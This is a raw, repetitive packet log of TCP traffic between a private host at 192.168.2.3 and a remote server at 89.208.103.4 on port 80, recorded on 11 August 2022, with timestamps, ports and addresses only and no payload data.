Aug 11, 2022 06:57:07.372595072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.372642040 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.382714987 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.382772923 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.382802963 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.382813931 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.382824898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.382854939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.382874012 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.382891893 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.382920980 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.382931948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.382949114 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.382971048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.382988930 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383008957 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383024931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383049965 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383064032 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383090973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383126020 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383131027 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383162022 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383172035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383172989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383210897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383225918 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383249998 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383266926 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383291960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383305073 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383330107 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383356094 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383378029 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383405924 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383451939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383462906 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383490086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383508921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383528948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383543015 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383569956 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383583069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383608103 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383622885 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383647919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383656979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383688927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383723021 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383727074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383742094 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383766890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383781910 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383809090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383812904 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383848906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.383862019 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.383902073 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.390475988 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.390530109 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.390562057 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.390572071 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.390598059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.390613079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.390642881 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.390650988 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.390665054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.390691996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.390719891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.390729904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.390743971 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.390769958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.390785933 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.390810013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.390825987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.390849113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.390865088 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.390889883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.390913963 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.390928030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.390955925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.390966892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.390991926 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.391006947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.391021013 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.391043901 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.391061068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.391086102 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.391093016 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.391125917 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.391140938 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.391165018 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.391177893 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.391206026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.391220093 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.391242981 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.391272068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.391294956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.399317980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.399398088 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.399405956 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.399454117 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.399461031 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.399492979 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.399508953 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.399530888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.399548054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.399570942 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.399584055 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.399627924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405195951 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405251026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405278921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405291080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405299902 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405332088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405339956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405370951 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405389071 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405412912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405431986 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405457973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405468941 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405499935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405508995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405540943 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405566931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405581951 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405592918 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405621052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405632019 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405661106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405673027 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405700922 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405718088 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405740023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405756950 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405781984 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405795097 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405822992 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405837059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405863047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405868053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405905008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405910969 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405945063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405950069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.405985117 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.405999899 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406024933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406039000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406064987 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406080961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406106949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406117916 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406148911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406160116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406189919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406202078 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406232119 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406248093 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406270981 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406277895 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406311035 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406325102 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406352043 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406369925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406394958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406411886 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406435966 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406455040 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406488895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406497002 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406529903 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406550884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406569958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406586885 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406609058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406630993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406649113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406661987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406692982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406709909 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406730890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406752110 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406770945 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406794071 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406810045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406824112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406852007 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406877041 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406893969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406913042 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406933069 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.406961918 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406980038 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.406985998 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407027006 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407040119 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407066107 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407104969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407129049 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407138109 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407143116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407145977 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407182932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407192945 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407222986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407236099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407262087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407278061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407305002 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407326937 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407329082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407367945 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407378912 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407407045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407448053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407483101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407488108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407500029 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407527924 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407542944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407567024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407598019 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407605886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407623053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407644987 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407660961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407684088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407694101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407725096 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407737970 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407763958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407779932 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407809019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407823086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407849073 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407860994 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407886982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407913923 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407926083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407932043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.407965899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.407982111 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408003092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408014059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408042908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408056021 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408082008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408098936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408121109 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408122063 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408164024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408179045 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408201933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408205032 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408242941 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408257008 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408282042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408294916 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408320904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408348083 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408360004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408364058 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408401966 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408412933 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408442020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408457041 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408482075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408505917 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408519983 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408530951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408560038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408576965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408605099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408611059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408626080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408660889 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408668041 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408682108 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408706903 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408720016 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408745050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408756971 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408783913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408799887 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408823013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408833981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408863068 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408875942 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408900976 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408919096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408941031 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408951044 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.408981085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.408996105 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409018993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409033060 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409058094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409066916 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409096956 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409111977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409133911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409145117 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409173012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409184933 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409210920 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409225941 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409250975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409264088 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409291029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409305096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409327984 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409344912 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409368038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409392118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409410000 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409415007 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409447908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409471989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409487009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409511089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409524918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409552097 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409564972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409584045 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409606934 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409632921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409645081 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409670115 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.409683943 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.409709930 CEST	49736	80	192.168.2.3	89.208.103.4
